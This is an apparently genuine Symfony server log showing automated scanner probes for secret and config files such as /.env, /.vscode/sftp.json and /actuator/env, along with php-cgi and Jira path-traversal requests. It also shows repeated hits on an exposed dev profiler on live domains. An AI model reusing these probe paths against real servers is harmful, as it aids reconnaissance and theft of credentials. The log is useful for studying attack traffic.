[2025-12-16 13:24:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:24:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:24:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:24:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:24:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/v1/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/v1/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:24:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:24:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v3/api-docs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v3/api-docs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:24:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-docs/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-docs/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:24:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/swagger.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/swagger.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:24:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /@vite/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /@vite/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:24:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:24:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:24:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:24:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:24:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:24:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:24:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:25:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:25:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:25:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:25:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:25:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:25:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:25:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:25:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:25:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 13:25:12] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
[2025-12-16 13:26:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a2a520","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a2a520?group=1&panel=db","method":"GET"} []
[2025-12-16 13:26:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
[2025-12-16 13:28:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb6686","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fb6686?panel=cache","method":"GET"} []
[2025-12-16 13:28:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-16 13:29:46] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"48ebd7","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/48ebd7/search/results?ip=146.19.24.116&limit=10","method":"GET"} []
[2025-12-16 13:29:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=146.19.24.116&limit=10","method":"GET"} []
[2025-12-16 13:36:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=exception","method":"GET"} []
[2025-12-16 13:36:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-16 13:55:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8be61d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8be61d?panel=dump","method":"GET"} []
[2025-12-16 13:55:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-16 13:57:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ad45cc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ad45cc?panel=config","method":"GET"} []
[2025-12-16 13:57:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-16 14:12:59] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"408a13","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/408a13/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-16 14:12:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-16 14:15:58] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-16 14:15:59] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-16 14:19:16] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-16 14:27:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"93e1f8","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/93e1f8?panel=config","method":"GET"} []
[2025-12-16 14:27:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-16 14:31:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"645f32","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/645f32?panel=logger","method":"GET"} []
[2025-12-16 14:31:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-16 14:31:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7a3a56","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/7a3a56","method":"GET"} []
[2025-12-16 14:31:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 14:57:36] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 14:57:54] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"132e26","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/132e26/search/results?ip=78.153.140.179&limit=10&method=GET","method":"GET"} []
[2025-12-16 14:57:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=78.153.140.179&limit=10&method=GET","method":"GET"} []
[2025-12-16 15:02:15] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 15:05:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=157.245.150.92&limit=10","method":"GET"} []
[2025-12-16 15:05:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=157.245.150.92&limit=10","method":"GET"} []
[2025-12-16 15:09:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c42df0","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/c42df0?panel=time","method":"GET"} []
[2025-12-16 15:09:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-16 15:09:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2261d2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2261d2","method":"GET"} []
[2025-12-16 15:09:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 15:20:22] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"OPTIONS"} []
[2025-12-16 15:22:51] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
[2025-12-16 15:22:51] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
[2025-12-16 15:22:51] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["8bc1b06d58adc8faddd36925c1 [...]"] []
[2025-12-16 15:22:51] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-16 15:22:51] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"3bb871acc2d065474990463a1c [...]","3":"2025-12-16 15:52:51","4":"","5":410,"6":"[]"} []
[2025-12-16 15:22:51] doctrine.DEBUG: "COMMIT" [] []
[2025-12-16 15:22:51] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-16 15:22:51] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"381c689347234863a298410dab [...]","3":"2026-02-14 15:22:51","4":"","5":410,"6":"[]"} []
[2025-12-16 15:22:51] doctrine.DEBUG: "COMMIT" [] []
[2025-12-16 15:22:51] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-16 15:22:51] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"8bc1b06d58adc8faddd36925c1 [...]"] []
[2025-12-16 15:22:51] doctrine.DEBUG: "COMMIT" [] []
[2025-12-16 15:22:52] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"a41ce4c3-29d5-4f1f-9146-ae339979667c","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/a41ce4c3-29d5-4f1f-9146-ae339979667c/invitation/10/0?order=desc","method":"GET"} []
[2025-12-16 15:22:52] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
